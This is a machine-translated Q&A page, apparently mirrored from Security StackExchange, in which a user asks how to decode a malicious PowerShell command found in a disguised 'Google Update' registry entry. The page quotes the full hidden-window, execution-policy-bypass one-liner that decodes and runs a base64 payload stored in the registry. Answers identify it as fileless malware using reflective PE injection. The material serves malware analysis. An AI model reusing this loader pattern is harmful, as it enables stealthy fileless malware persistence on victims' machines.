首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >问答首页 >如何从注册表读取此编码的powershell脚本的源代码?

如何从注册表读取此编码的powershell脚本的源代码?
EN

Security用户
提问于 2016-03-29 13:36:26
回答 2查看 1.4K关注 0票数 1

这句话是ProcessExplorer写的

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe“-noprofile -windowstyle隐藏-executionpolicy旁路iex (Text.Encoding::ASCII.GetString(转换::FromBase64String((gp 'HKCU:\Software\Classes\ZXWNMNLIMAGAL').LOOTDA)));

现在,我确信当我从注册表中读取该病毒时,它可能是一种编码的病毒:

谷歌更新"C:\Users\michael\AppData\Local\Google\Update\GoogleUpdate.exe“C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe REG_SZ /c {BE9473EA-5660-4BF7-91C3-2A2258213EE1} REG_SZ -noprofile -windowstyle隐藏-executionpolicy绕过iex (Text.Encoding::ASCII.GetString(转换::FromBase64String((gp 'HKCU:\Software\Classes\ZXWNMNLIMAGAL').LOOTDA)));

因此,我从注册表导出了数据值LOOTDA,并将其复制为文本文件,并将其上传为这里

因此,我正在寻找任何专家在加密和解密,以解码和解密这种病毒,以便阅读其源代码和什么可能对我们有害!

谢谢!

EN

回答 2

Security用户

回答已采纳

发布于 2016-03-29 14:01:25

此恶意软件试图避免使用文件和进程,方法是将有效负载驻留在注册表中,并使用PowerSploit方法通过PowerShell命令将代码直接加载到内存中。Invoke-ReflectivePEInjection给出了它。它属于Terkop恶意软件家族。

票数 3
EN

Security用户

发布于 2016-03-29 13:44:26

你不需要

任何加密和解密专家

你需要一个base64解码器,就像这一个

票数 1
EN
页面原文内容由Security提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:

https://security.stackexchange.com/questions/118870

复制
相关文章

相似问题

领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档